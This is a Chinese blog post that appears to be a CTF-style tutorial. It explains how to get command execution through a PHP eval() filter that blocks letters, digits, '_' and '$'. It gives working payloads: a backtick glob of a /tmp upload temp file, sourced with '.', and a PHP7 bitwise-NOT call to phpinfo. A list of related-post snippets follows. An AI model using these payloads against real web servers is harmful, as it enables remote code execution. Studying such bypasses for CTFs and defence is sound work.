过滤了字母、数字、_、$的webshell命令执行技巧

已于 2024-08-12 01:03:58 修改
阅读量691 收藏 17
点赞数 12
文章标签: 前端 linux php web安全
于 2024-08-12 01:01:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72654572/article/details/141112586
版权

目录

对于php5以上首先要解决的问题有

解决技巧

1.code长度小于35位

2.没有字母、数字、_ 、$

3.怎么把文件放进服务器

4.怎么执行文件里面的内容

        1.执行Linux命令

        2.执行文件里面的shell命令

5.构造完整的code参数

6.我们还可以通过修改文件里面shell命令,执行不同的命令

对于php7可以用取反绕过的技巧( ~ 是取反的意思)

<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

这个代码怎么利用

对于php5以上首先要解决的问题有

1.code长度小于35位

2.没有字母、数字、_ 、$

3.怎么把文件放进服务器

4.怎么执行文件里面的内容

解决技巧

1.code长度小于35位

这个问题和整体思路有关,要和后面的一起考虑

2.没有字母、数字、_ 、$

可以不用字母数字,Linux系统文件名支持通配符方式查找

比如

* 代表任意长度的字符

?代表任意一个长度的字符

[ ] 匹配括号里面的任意一个

这道题我们要找文件,不能用字母,数字等,因为我们要找的文件有个特点是在tmp下,9位,最后一位有几率是大写字母,所以我们可以用通配符和ascii码结合一下,写出payload

/???/????????[@-[] 

因为最后一位是大写,所以可以用@-[ ,因为@到[ 的ASCII码正好刚刚好包含了大写字母

3.怎么把文件放进服务器

写一个文件上传的html页面,作用是用burp工具拿取文件上传的请求标准格式和里面特有的标记

<!DOCTYPE html>
<html lang="zh">
<head>  
    <meta charset="UTF-8">  
    <title>文件上传示例</title>  
</head>
<body>
    <form action="upload.php" method="post" enctype="multipart/form-data">
        <label for="file">选择文件:</label>
        <input type="file" name="file" id="file" required>
        <input type="submit" value="上传">
    </form>
</body>
</html>

在上传的文件1.txt里面写上#!bin/bash

                                           id          

复制如图的请求标识,备用      

4.怎么执行文件里面的内容

在发送上一步文件上传请求后,Linux会在tmp下生成一个临时文件,我们要运行并执行文件里面的内容

        1.执行Linux命令

                在Linux里面``反引号可以执行命令,所以我们用

                `/???/????????[@-[]`

                来执行查找临时文件的命令,

        2.执行文件里面的shell命令

               在文件路径的前面加上   .  可以执行文件里面的命令

        所以payload是

                `. /???/????????[@-[]`

5.构造完整的code参数

        code=?><?=`. /???/????????[@-[]`;?>

<?是php的开头,为什么前面还要加一个?>呢

因为这个是php官方要求的,目的是为了防止前面的代码进行干扰,就用?>进行闭合,

然后再写我们的php代码。

如图所示,post请求是可以把get请求参数和post请求一起进行传递的

整个过程是,post请求把带有shell命令的临时文件生成,然后get请求传递code值放入eval()里面,

然后执行查找临时文件的命令,找到了临时文件,然后用 . 来执行文件里面的显示当前用户id的命令,最后,用户id信息就会显示在响应包里面

6.我们还可以通过修改文件里面shell命令,执行不同的命令

对于php7还可以用取反绕过的技巧( ~ 是取反的意思)

PHP7允许用($a)();这样的方法来执行动态函数,所以我们可以想到直接(phpinfo)();

但是由于过滤了字母,不能直接写phpinfo,可以进行取反

把phpinfo用php代码进行取反,得到

%8F%97%8F%96%91%99%90

取反绕过了以后再取反一次,就回到了我们的phpinfo

所以可以构造payload为

code=(~%8F%97%8F%96%91%99%90)();

网安小菜鸡
关注
命令执行各种姿势总结
weixin_48427966的博客
04-24 1462
一、绕过if(!eval($c);web30。
不包含字母数字webshell
m0_59049258的博客
08-19 507
当$ 和 _ 没有被限制时。
php5构造无字母数字webshell实现任意命令执行
qq_68163788的博客
12-02 1401
Webshell是一种恶意软件,通常指的是通过网络渠道上传到受攻击的服务器上的一段可执行代码。它可以被用来获取对服务器的远程控制权限,执行各种操作包括文件管理、数据库访问、系统命令执行等。
PHP代码执行绕过姿势 无数字字母类型
qq_45691294的博客
10-31 3433
问题引导 <?php highlight_file(__FILE__); header("Content-type:text/html;charset=utf-8"); error_reporting(0); if(preg_match('/[a-z0-9]/is',$_GET['shell'])){ echo "hacker!!!"; }else{ eval($_GET['shell']); } 看到上面的代码,很明显是一道代码执行的题目,但是利用难点在对输入参数进行了正则匹配,过
字母绕过webshell
banliyaoguai的博客
08-13 722
但是抓取临时文件很难因为你上传上去后,没有接收文件,系统就会很快的删除掉你的文件,然后想要接收文件还需要知道文件名字,但是文件名是一个随机字符没有用办法接到。··反引号可以在eval中命令执行在这里的代码就是上面说的匹配上文件,再进行命令执行,然后由于这个是get传参所以需要需要进行url编码,然后就执行成功了。如果可以访问并执行临时文件,就可以进行命令执行了,我们在要上传的文件上写入你要执行命令,如下图所示。在PHP7中我们可以使用('phpinfo')(),这样的代码执行,如下图。
利用异或、取反、自增bypass_webshell_waf
qq_68163788的博客
12-01 1609
可以使用异或操作来绕过WebShell WAF(Web应用程序防火墙)。,可以使用异或操作来对WebShell进行加密,使其在传输过程中不被WAF检测到。另外,还可以利用取反操作或自增操作来对WebShell进行变换,以避免WAF的检测。需要注意的是,绕过WAF是违法行为,请遵守当地法律法规。
命令执行漏洞和代码执行漏洞详解 一文了解命令执行漏洞和代码执行漏洞
闵行小鱼塘
11-08 2841
本篇总结归纳命令执行漏洞(RCE)和代码执行漏洞
命令执行漏洞
qq_48904485的博客
03-21 2061
一、命令执行介绍 1、命令执行漏洞原理 命令执行漏洞定义:Web应用程序接收用户输入,拼接到要执行的系统命令执行。 产生原因: 1、用户输入未过滤或净化; 2、拼接到系统命令执行。 2、PHP命令执行函数 在PHP中具有执行系统命令功能的函数如下: 1、system 2、exec 3、shell_exec 4、passthru 5、popen 6、proc_popen 7、`反引号 8、ob_start 9、mail函数+LD_PRELOAD执行系统命令 使用示例: L
字母数字RCE与LD_PRELOAD绕disable_functions
D.MIND 的博客
04-19 1275
<?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); }
Web安全 _ 无字母数字Webshell 总结.pdf
09-06
Web安全】无字母数字Webshell总结 在Web安全领域,Webshell是一种常见的攻击手段,用于在目标服务器上获得远程控制。无字母数字Webshell是指避开常规字母数字字符限制的Webshell构造方法。通常,服务器会通过...
cmd echo写入shell_学习笔记-命令执行及花式bypass写shell
weixin_30801745的博客
01-26 1780
命令执行的坑其实早就想填了。最早是因为校赛时,easyphp一题自己因为不熟悉命令执行的一些特性导致套娃题绕到最后一层却没拿到flag。当时十分不爽,下定决心要好好了解下命令执行的相关知识点。关于命令执行我大体上归为php绕过+rce两类。php的难点主要是在绕过写shell上,而linux的知识主要在RCE达成上。先从简单说起:linux 命令& RCErce,即remote comma...
CTFShow Web入门 命令执行
qq_19533763的博客
04-01 7197
命令执行绕过姿势:https://blog.csdn.net/qq_45836474/article/details/107248010 Web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 可以看
CTFHUB-RCE通关记录以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2207
先过关,再分析相关的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤了cat 而该服务器为Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
webview2加载本地页面
qq_25160759的博客
09-23 668
推荐使用这种方式,加载速度比WebResourceRequested快(实测的确是快点),但是需要支持:ICoreWebView2_3。个人测试加载html字符串,对于html中引入了css和js,加载不太友好。这种方式是通过截获网络请求,然后返回需要的数据。以达到成功请求的假象。
前端面试经验总结2(经典问题篇)
最新发布
rita_0567的博客
09-28 681
因为计算机技术的快速发展,所以程序员如果不能保持对技术的持续性学习,会更容易的被淘汰,我从来不觉得程序员是一个轻松的职业,但是程序员是我最热爱的职业,我做好了充足的准备让自己能够长期在前端行业深耕。既要扩充自己的知识宽度,同时又不要一味的追求学习的东西越多越来,今天学两天这个,明天学两天那个,工作中又没有得到使用的话,很快也都会忘记的。了解,贵公司主要是在xxx行业从事xxx业务,贵公司所处的行业是我非常看好的,我感觉贵公司的氛围我很喜欢,比如xxxx。遇到了哪些挑战,我如何在不利的条件下成长起来的。
apply、call和bind的作用和区别
欢迎来到我的博客!我是一名全栈开发工程师,主攻前端开发。希望通过我的博客,能够与大家共同学习和成长。感谢您的关注和支持!
09-23 731
javascript中,apply、call和bind的作用和区别介绍。
DC00015基于java web校园网上购物系统
黄昏下的黎明的博客
09-24 673
DC00015【含配套文档】基于java web校园网上购物系统。
PHP扩展模块突破Disable_functions执行命令技巧
在这种情况下,攻击者可以创建一个PHP扩展,包含一个可以执行系统命令的函数,然后通过WebShell中的`dl()`调用来加载这个扩展,从而绕过`disable_functions`的限制,执行他们想要的命令。 为了防御此类攻击,系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值